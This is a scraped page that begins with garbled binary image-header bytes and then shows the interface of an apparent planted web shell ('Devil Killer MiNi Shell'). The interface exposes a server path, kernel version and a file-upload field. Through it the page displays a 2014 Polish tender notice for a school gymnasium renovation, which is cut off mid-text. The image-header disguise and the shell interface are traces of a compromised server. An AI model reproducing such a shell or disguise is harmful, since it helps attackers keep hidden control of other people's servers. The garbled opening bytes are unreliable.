JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140725/249522-N-2014.html

<p class="kh_header"><b>Tomaszów Lubelski: Remont budynku sali gimnastycznej w Zespole Szkół Nr 3 Tomaszów  Lubelski 
  ul. Hallera 5</b><br>
<b>Numer ogłoszenia: 249522 - 2014; data zamieszczenia: 25.07.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zespół Szkół nr 3 im. Macieja Rataja , ul. Hallera 5, 22-600 Tomaszów Lubelski, woj. lubelskie, tel. 084 6650505, faks 084 6650505.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.odt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Remont budynku sali gimnastycznej w Zespole Szkół Nr 3 Tomaszów  Lubelski 
  ul. Hallera 5.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie robót budowlanych w budynku sali gimnastycznej Zespołu Szkół nr 3 
w Tomaszowie Lubelskim przy ul. Hallera 5, obejmujące rodzaje robót- 
Instalacja elektryczna i ogólnobudowlana  w zarysie:
DZIAŁ 1 SALA GIMNASTYCZNA
1.1 ROZBIÓRKI
- rozebranie starych ramiaków obudowy grzejników
- wykucie z muru drobnych elementów metalowych  rur instalacji c.o itp.
- demontaż paneli ściennych
1.2 ROBOTY TYNKARSKO-MURARSKIE
- zamurowanie i otynkowanie wnęk grzejnikowych w ścianach szczytowych
- odbicia uszkodzonych starych tynków filarków, ścian i słupów
- wykonanie uzupełnień tynków j.w i stropowych
- przecieranie starych tynków ścian szczytowych
- rozliczenie rusztowań
1.3 ROBOTY STOLARSKIE, WYMIANA STOLARKI DRZWIOWEJ
- wykonanie zawiasów obudowy grzejników pod parapetami
- montaż zasuwnic podłogowych obudowy grzejników
- wymiana drzwi wejściowych dwuskrzydłowych drewnianych na aluminiowe pełne - 6.22m2, skrzydła drzwiowe o różnej szerokości - minimalna szerokość skrzydła szerszego w świetle otworu minimum 90cm - jak dla osób niepełnosprawnych
1.4 INSTALACJA NAWIEWU I WENTYLACJI
- wykonanie przebić w stropodachu i montaż  3 wywietrzaków dachowych 
fi 160mm w co 2 polu
- wykonanie nawietrzaków podokiennych szt. 7 pod parapetami (nad grzejnikami)
1.5 MALOWANIE ŚCIAN, SUFITU, OKŁADZINY
- przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
- wykonanie okładzin z tynku  żywicznego (mozaikowego) na filarkach międzyokiennych ściany okiennej do poziomu parapetów oraz na ścianie wewnętrznej do wysokości 3.05m na wysokość drabinek gimnastycznych
1.6 PODŁOGA
- całkowity demontaż starej podłogi sportowej
- wykonanie nowej podłogi sportowej powierzchniowo-sprężystej na legarach krzyżowych z podkładkami sprężystymi - posadzka z parkietu sportowego litego dębowego (o minimalnej grubości deszczułek 22 mm) układanego na sucho na folii paroizolacyjnej z minimum trzykrotnym
lakierowanie podłogi i malowaniem linii boisk do siatkówki w pełnym wymiarze ,  
                       do koszykówki  w niepełnym wymiarze.
- w podłodze wykonać 2 wejścia do kanału ciepłowniczego
1.7 URZĄDZENIA WYPOSAŻENIA HALI
- wykonanie otworu w posadzce (przy ścianie wewnętrznej) do osadzenia słupka do siatkówki
- wykonanie konstrukcji wsporczej słupka do siatkówki w kanale ciepłowniczym z kątownika   65x65x9 mm
- zabetonowanie tulei słupków i osadzenie ramek dekli posadzkowych - UWAGA- w kosztorysie uwzględniono słupki aluminiowe z kompletem osprzętu
- uzupełnienie brakujących mocowań drabinek gimnastycznych w hali
- montaż tablic do koszykówki - akrylowych o grubości 15 mm, mocowanych do ścian przy użyciu metalowych konstrukcji wsporczych
1.8 ROBOTY INSTALACJI C.O.
- demontaż i ponowny montaż grzejników ściennych
DZIAŁ 2 KORYTARZ
2.1 ROBOTY STOLARSKIE, WYMIANA STOLARKI
- wykucie z muru ościeżnicy metalowej (łazienka nauczycieli), osadzenie ościeżnicy drewnianej i drzwi płytowych w okleinie drewnianej,
- wymiana drzwi drewnianych dwuskrzydłowych oszklonych na  drzwi aluminiowe dwuskrzydłowe szklone 3.05 m2- skrzydła drzwiowe o różnej szerokości - minimalna szerokość skrzydła szerszego (w świetle otworu) minimum 90cm - jak dla osób niepełnosprawnych - z progiem ukrytym
- uzupełnienie brakującej opaski przy naświetlu
2.2 ROBOTY TYNKARSKIE I OKŁADZINY Z PŁYT GIPSOWO-KARTONOWYCH
- wykucie z muru elementów metalowych
- wykonanie tynków ościeży drzwi do łazienki dla nauczycieli,
- odbicie uszkodzonych (zagrzybionych) tynków, odgrzybienie ściany i wykonanie nowego tynku
- uzupełnienie uszkodzonych tynków
- odbicie cokolika posadzki i naprawa uszkodzeń
- wykonanie termoizolacji rurociągów przed obudową płytami G-K
- wykonanie obudowy rurociągów płytami G-K
2.3 ROBOTY MALARSKIE
- przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
- wykonanie okładzin z tynku Żywicznego (mozaikowego) na ścianach do wysokości 2.05m 
(na wysokość drzwi)
2.4 POSADZKI I OKŁADZINY
- przygotowanie, wyrównanie i gruntowanie podłoży oraz wykonanie okładzin podłogowych z płytek Gres 30x30 cm z cokolikami
- naprawa okładzin ościeży (łazienka nauczycieli)
DZIAŁ 3 MAŁA SALA
3.1 roboty tynkarskie- wykucie z muru elementów metalowych,  uzupełnienie uszkodzonych tynków,
  odbicie cokolika posadzki i naprawa uszkodzeń
3.2 POSADZKA
- rozebranie posadzki , przygotowanie, gruntowanie podłoża, wykonanie warstwy wyrównawczej
- wykonanie warstwy izolacyjnej z folii w płynie - 2 warstwy
- wykonanie wykładziny rulonowej sportowej (minimalna grubość wykładziny 8.3 mm - przeznaczenie do obiektów sportowych) o połączeniach zgrzewanych
3.3 ROBOTY MALARSKIE
- przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
- ługowanie lamperii w miejscu pod lustra 
- wykonanie lamperii olejnych
3.4 instalacja c.o- demontaż i ponowny montaż grzejników ściennych
3.5 WYPOSAŻENIE
- montaż drabinek gimnastycznych szt.5
- montaż zestawu luster na ścianie o wym, 5,60 x 1,60 m
DZIAŁ 4 SZATNIA CHŁOPCÓW
4.1 instalacja c.o - demontaż i ponowny montaż grzejnika
4.2 ROBOTY TYNKARSKIE
- wykucie otworu, sprawdzenie kanału wentylacyjnego, osadzenie kratki
- ługowanie lamperii olejnej, - uzupełnienie i naprawy uszkodzonych tynków
4.3 ROBOTY MALARSKIE
- przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
4.4 OKŁADZINY ŚCIENNE
- przygotowanie i wyrównanie podłoży
- okładziny ścienne z płytek z osadzeniem profili narożnych
DZIAŁ 5 SZATNIA DZIEWCZĄT
5.1 STOLARKA - wymiana drzwi wewnętrznych do sanitariatu
5.2 REMONT INSTALACJI WODOCIĄGOWEJ
- wykonanie przebudowy instalacji wodociągowej w pomieszczeniu z ukryciem rur w ścianach
- wykonanie zaworów na instalacji w krytych wnękach
5.3 ROBOTY TYNKARSKIE
- wykucie otworu, sprawdzenie kanału wentylacyjnego, osadzenie kratki
- ługowanie lamperii olejnej,  uzupełnienie i naprawy uszkodzonych tynków
5.4 ROBOTY MALARSKIE
- przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
5.5 OKŁADZINY ŚCIENNE
- przygotowanie i wyrównanie podłoży
- okładziny ścienne z płytek z mocowanie profili narożnych
DZIAŁ 6 UMYWALNIE DZIEWCZĄT I CHŁOPCÓW
Rozwiązanie techniczno-funkcjonalne adaptacji pomieszczenia na dwie umywalnie przedstawiono na załączonym do charakterystyki rysunku nr 1.
6.1 instalacja C.O,  demontaż i ponowny montaż grzejnika
6.2 ROBOTY MUROWE, ZAMUROWANIA, PRZEBICIA
- wykonanie ścianki działowej pomiędzy pomieszczeniami
- zamurowanie zbędnego otworu drzwiowego
- wykonanie przebicia na nowy otwór wejściowy z wykonaniem nadproża z belek stalowych
6.3 ROBOTY TYNKARSKIE
- wykonanie tynków na ościeżach,
- wykucie otworów w kominach, sprawdzenie kanału wentylacyjnego, osadzenie kratki
- wykonanie tynków pod okładziny ścienne
6.4 OKŁADZINY ŚCIENNE
- przygotowanie i wyrównanie podłoży
- okładziny ścienne z płytek z mocowanie profili narożnych
6.5 INSTALACJA WODNO-KANALIZACYJNA
- demontaż przyborów i podejść w umywalni
- montaż sieci wodociągowej i kanalizacyjnej w pomieszczeniach
- montaż przyborów i osprzętu wodno-kanalizacyjnego
- wykonanie termoizolacji na przewodach wodociągowych
- próby szczelności instalacji - UWAGA - włączenie do kanalizacji - istniejące
6.6 ROBOTY STOLARSKIE - wykonanie przewodu wentylacyjnego do umywalni dziewcząt
- montaż naświetla pomiędzy umywalniami, montaż blatu do osadzenia umywalek szt.2
- wymiana drzwi wejściowych do sanitariatu (chłopcy)
6.7 ROBOTY MALARSKIE - przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
DZIAŁ 7 SANITARIATY DZIEWCZĄT I CHŁOPCÓW
1.-  wykucie otworów w kominach, sprawdzenie kanału wentylacyjnego, osadzenie kratki
     - wykonanie 2 kanałów wentylacyjnych z nawietrzaka dachowego,
2 MALOWANIE - przygotowanie powierzchni ścian i sufitu wraz z gruntowaniem podłoży, malowanie emulsyjne 2x
DZIAŁ 8 POMIESZCZENIE SOCJALNE Nauczycieli
8.1 OBUDOWA RUROCIĄGU - wykonanie termoizolacji przewodu, wykonanie obudowy z płyt G.K
- malowanie emulsyjne wykonanej obudowy G.K.

DZIAŁ 9 3.1.10. WYMIANA OPRAW OŚWIETLENIOWYCH W SALI GIMNASTYCZNEJ 
          I NA KORYTARZU PRZYLEGAJĄCYM DO SALI GIMNASTYCZNEJ.
- Demontaż opraw świetlówkowych, z rastrem z tworzyw sztucznych lub metalowym  szt. 21
- Demontaż osłon kratowych z opraw oświetleniowych kpl., 21
 - Montaż opraw i tablicy oświetleniowej w sali gimnastycznej,  
- Oprawy przykręcane metalohalogenkowe stalowe z siatka ochronną  kpl.  12
- Demontaż opraw w korytarzu, zdemontować oprawy zamontowane na ścianach , a zamontować nowe oprawy świetlówkowe hermetyczne na suficie. Istniejące przewody do opraw i łączników montowane na uchwytach zdemontować , nowe przewody ułożyć w bruzdach pod tynkiem, 
zasilanie bez zmian z ist. rozdzielnicy.
-Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 1-fazowy pomiar 
-Sprawdzenie i pomiar obwodu elektrycznego nn, obwód 3-fazowy pomiar 
- Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, skuteczność
zerowania, pomiar pierwszy ,
-  Badania i pomiary instalacji uziemiającej, piorunochronnej i skuteczności zerowania, skuteczność
zerowania, pomiar każdy następny..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.41.00.00-4, 45.42.00.00-7, 45.43.00.00-0, 45.44.00.00-3, 45.31.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 60.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Informacja na temat wadium: Wykonawca przystępujący do przetargu zobowiązany jest wnieść wadium. 2. Zamawiający ustala kwotę wadium w wysokości 5000 zł słownie: pięć tysięcy złotych. 3.Wadium należy wnieść przed upływem terminu składania ofert. 4.Wadium może być wnoszone w jednej lub kilku następujących formach: a.w pieniądzu, b.poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym; c.gwarancjach bankowych; d.gwarancjach ubezpieczeniowych; e.poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości Dz. U. z 2007 r. Nr 42, poz. 275, z późn. zm. 9.5.Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy 60 9620 0005 0000 3652 2000 0140 Bank Spółdzielczy w Łaszczowie z dopiskiem wadium do przetargu na roboty budowlane Remont budynku sali gimnastycznej Zespołu Szkół Nr 3 w Tomaszowie Lub. przy ul. Hallera 5. Oryginalne dokumenty poręczenia i gwarancji należy dołączyć do oferty. 6.Za skuteczne wniesione wadium w pieniądzu zamawiający uważa wadium, które w oznaczonym terminie znajdzie się na koncie zamawiającego. 7.Wadium musi obejmować cały okres związania ofertą i nie może zawierać żadnych ograniczeń sprzecznych z ustawą, w szczególności ograniczających możliwość zrealizowania praw określonych w art.46 ust.4a i 5 ustawy Pzp. 8.Wadium wnoszone w innej formie niż pieniądz winno być wystawione na Zamawiającego, mieć formę oświadczenia bezwarunkowego, nieodwołalnego i płatnego na pierwsze pisemne żądanie zamawiającego. 9.Zamawiający zwraca wadium zgodnie z art.46 ust.1,1a,2,4 ustawy Pzp. 10.Zamawiający żąda ponownego wniesienia wadium zgodnie z art. 46 ust.3 ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony w odniesieniu do Wykonawców, którzy wykażą się wiedzą i doświadczeniem w wykonaniu (zakończeniu) w okresie ostatnich 5 lat przed upływem składania ofert, a jeżeli okres prowadzenia działalności jest krótszy- wykonał w tym okresie, minimum jedno odrębne zamówienia na roboty budowlane polegające na budowie, remoncie lub modernizacji podłogi i parkietu w hali gimnastycznoj-sportowej o pow. minimum 300m2 i wartości robót minimum 100 000 zł brutto, w budynku użyteczności publicznej lub innym budynku o zbliżonym charakterze i funkcji. Ocena spełnienia przez wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych dokumentów i oświadczeń, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie stawia szczególnych wymagań w zakresie spełnienia tego warunku</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony przez Wykonawców którzy dysponują co najmniej 2 osobami zdolnymi do wykonania zamówienia, tj: a)osoby te powinny posiadać określone przepisami Prawa budowlanego kwalifikacje zawodowe konieczne do realizacji zamówienia w rozumieniu ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2013r., poz. 1409 ), b)powinny posiadać 5 letnie doświadczenie zawodowe w kierowaniu pracami budowlanymi w zakresie posiadanych uprawnień budowlanych (funkcja kierownika budowy lub kierownika robót o charakterze zbieżnym z zakresem robót będących przedmiotem zamówienia z posiadanymi uprawnieniami ), a w szczególności : - dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej, - dysponują osobą posiadającą uprawnienia budowlane bez ograniczeń do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych oraz elektroenergetycznych. Zamawiający przez spełnienie warunku dotyczącego stażu pracy rozumie pełnienie ww. funkcji po uzyskaniu uprawnień budowlanych zgodnie z obowiązującymi w tym zakresie przepisami prawa. 2.Zamawiający określając wymogi dla osób w zakresie posiadanych uprawnień budowlanych dopuszcza odpowiadające im uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów. 3. Ocena spełnienia przez wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna przedmiotowy warunek za spełniony przez Wykonawców, którzy wykażą posiadanie środków finansowych lub zdolność kredytową w wysokości nie mniejszej niż 150 000 zł.Ocena spełnienia przez wykonawców warunków udziału w postępowaniu będzie dokonana na podstawie wymaganych oświadczeń i dokumentów, według formuły: spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.. Jeżeli Wykonawca, wykazując spełnianie warunków, o których mowa w art. 22 ust. 1ustawy, polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2b ustawy Pzp, zobowiązany jest udowodnić, iż będzie dysponował zasobami innych podmiotów w stopniu niezbędnym dla należytego wykonania zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania do dyspozycji wykonawcy niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia. Dokument, z którego będzie wynikać zobowiązanie podmiotu trzeciego powinien wyrażać W sposób wyraźny i jednoznaczny wolę udzielenia wykonawcy ubiegającemu się o zamówienie odpowiedniego zasobu oraz wskazywać: a) jaki jest zakres dostępnych wykonawcy zasobów innego podmiotu, b) w jaki sposób zostaną wykorzystane zasoby innego podmiotu przez wykonawcę przy wykonywaniu zamówienia, c) jakiego charakteru stosunki będą łączyły wykonawcę z innym podmiotem, d) jaki jest zakres i w jakim okresie inny podmiot będzie brał udział przy wykonywaniu zamówienia. 7.1.8. Jeżeli wykonawca wykazując spełnienie warunków, o których mowa w art. 22 ust.1 Pzp polega na zasobach innych podmiotów na zasadach określonych w art. 26 ust.2 b ustawy Pzp a podmioty te będą brały udział w realizacji części zamówienia , zamawiający żąda od wykonawcy przedstawienia w odniesieniu do tych podmiotów dokumentów dotyczących tego podmiotu w 